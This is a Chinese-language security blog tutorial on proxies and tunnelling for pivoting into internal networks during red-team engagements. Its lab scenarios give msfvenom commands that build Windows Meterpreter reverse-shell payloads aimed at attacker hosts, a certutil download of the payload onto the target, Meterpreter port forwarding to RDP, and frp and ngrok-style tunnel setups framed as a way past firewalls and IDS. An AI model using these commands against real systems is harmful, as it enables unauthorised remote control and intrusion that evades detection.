https://mp.weixin.qq.com/s/SelmVdwuYsAgxBAOWnKoeA
原创 小智 智检安全 2023年10月18日 15:37 陕西
前言介绍
一、正向代理
二、反向代理
三、内网穿透代理隧道技术说明
隧道知识
一、概述&原理
二、常见的隧道
三、代理场景
Hello,好久不见哦!红蓝对抗过程中打点以后往往需要进行内网渗透和横向移动,因此大家都需要扎实掌握代理和隧道知识,一款优秀的代理工具也可以给内网渗透带来很大的收益。本期小智将通过简单易懂的方式向大家普及各种代理逻辑及隧道的原理。
前言介绍
一、正向代理
代理客户端,帮助客户端完成所需请求。
【举例】:小智要向银行贷款,可是因为自己资历不够,所以不获银行放贷,小智个人无法贷到所需款项。此时,只要小智找一个满足资历的B先生去帮忙借贷,银行自然就会放贷。贷款到账后,B先生再私下把钱给到小智。从整个流程来看,对于银行(服务端)来说,款项是贷给B先生了,但实际上款项还是流向了小智(客户端),但银行(服务端)是不知道的。
二、反向代理
代理服务端,帮服务端去完成所需请求。
【举例】:小智拨打电信客服电话,此时语音提小智选择所需的业务办理和进入人工服务。当您完成选择后,服务器会根据您请求的业务进行分配,空闲的人工服务人员帮助小星解决问题。此时,小智(客户端)并不知道服务端中处理请求的人是谁,只知道是电信的人员,这种现象与正向代理相反。
三、内网穿透代理隧道技术说明
【代理】 : 解决的是网络不通的问题。
【隧道】 : 解决的是流量分析工具 , 流量检测工具 , 和防火墙相关过滤问题。
隧道知识
一、概述&原理
在一般的网络通信中,两台机器之间先建立TCP连接,然后正常的进行数据通信。在实际的环境中,通常会通过各种边界设备、软/硬件防火墙甚至是IDS来检查对外连接情况,发现异常就会进行阻断。这个时候我们通过自己搭建隧道解决这类问题。
这里所讲的隧道,是指一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙与对方通信。当被封装的数据包到达目的地后,将数据包还原,并将还原的数据包发到相应的服务器上。
二、常见的隧道
【网络层】:IPv6隧道、ICMP隧道、GRE隧道。
【传输层】:TCP隧道、UDP隧道、常规端口转发。
【应用层】:SSH隧道、HTTP隧道、HTTPS隧道、DNS隧道。
三、代理场景
使用端口转发技术 , 访问到真实主机的其他没有映射出来的端口 , 也就是内网那些端口
【攻击者】
带有公网ip的vps
【目标端】
只能访问80的http端口 , 是NAT映射出来的 , 不能链接3389端口 , 能出网
实验目标 :
通过端口转发 , 链接到目标机器的3389端口
kali 上的msf上线虚拟机win2012 , 链接3389
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.6.102 L
PORT=8001 -f exe -o /tmp/payload.exe
window12下载
certutil -urlcache -split -f http://192.168.6.102:8000/payload
.exe payload.exe
拿到meterpreter回话执行
添加端口
portfwd ?
portfwd add -l 5656 -p 3389 -r 192.168.6.140 ( 感觉并不好用 )
kali连接
rdesktop 127.0.0.1:5656
原理:通过这个会话把访问kali的 5656 端口的流量转发到靶机的3389端口上,把靶机的3389端口的流量转发到kali的5555端口上。
如果网络环境不好 , 会话非常容易断开链接
Win + r , 输入 mstsc , 192.168.0.157
图片
在kali中连接
rdesktop 127.0.0.1:3389
图片
可能会有网络波动 , 不是很稳定 , frp也可以实现端口转发的功能 , frp非常强大 , 这种内网端口转发到公网上 ,非常的简单。
场景二
:双方都在内网
这种就是偏向于个人电脑对战个人电脑的场景
攻击者的机器
内网地址 , 但是能出网
目标机器
不同的内网地址 , 但是能出网
通过 Ngrok 进行内网穿透 , 需要购买一个内网穿透服务
图片
图片
记录隧道域名和隧道id
图片
下载客户端 , 根据你的远控所在的系统下载 , 比如我的远控是msf , 系统是kali
图片
解压客户端 , 然后再kali上运行
./sunny clientid 163836369558
msf生成木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=free.idcfengy
e.com lport=10354 -f exe -o /tmp/test.exe
msf开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.6.102
set lport 8001
exploit
免费的不稳定 , 很容易掉 , 实战推荐付费 , 这里记住原理就好了
通过 frp 进行内网穿透
需要一台vps , 然后再vps上执行frps
https://github.com/fatedier/frp/releases/tag/v0.44.0
启动服务端:
./frps -c ./frps.ini
内网kali上修改配置文件 frpc.ini
[common]
server_addr = 192.168.6.102
server_port = 7000
[msf]
type = tcp
local_ip = 127.0.0.1
local_port = 8001
remote_port = 10126
简单理解就是把公网 10126 的流量转发到本地 8001 上
kali上运行frpc
./frpc -c ./frpc.ini
生成msf木马
msfvenom -p windows/meterpreter/reverse_tcp lhost=119.3.12.54
lport=10126 -f exe -o /tmp/m.exe
监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 8001
exploit
靶机运行m.exe , 上线成功
图片
好了这期分享到此结束,咱们下次见!
免责声明:涉及到的所有技术仅用来学习交流,严禁用于非法用途,未经授权请勿非法渗透。否则产生的一切后果自行承担!
微信扫一扫
关注该公众号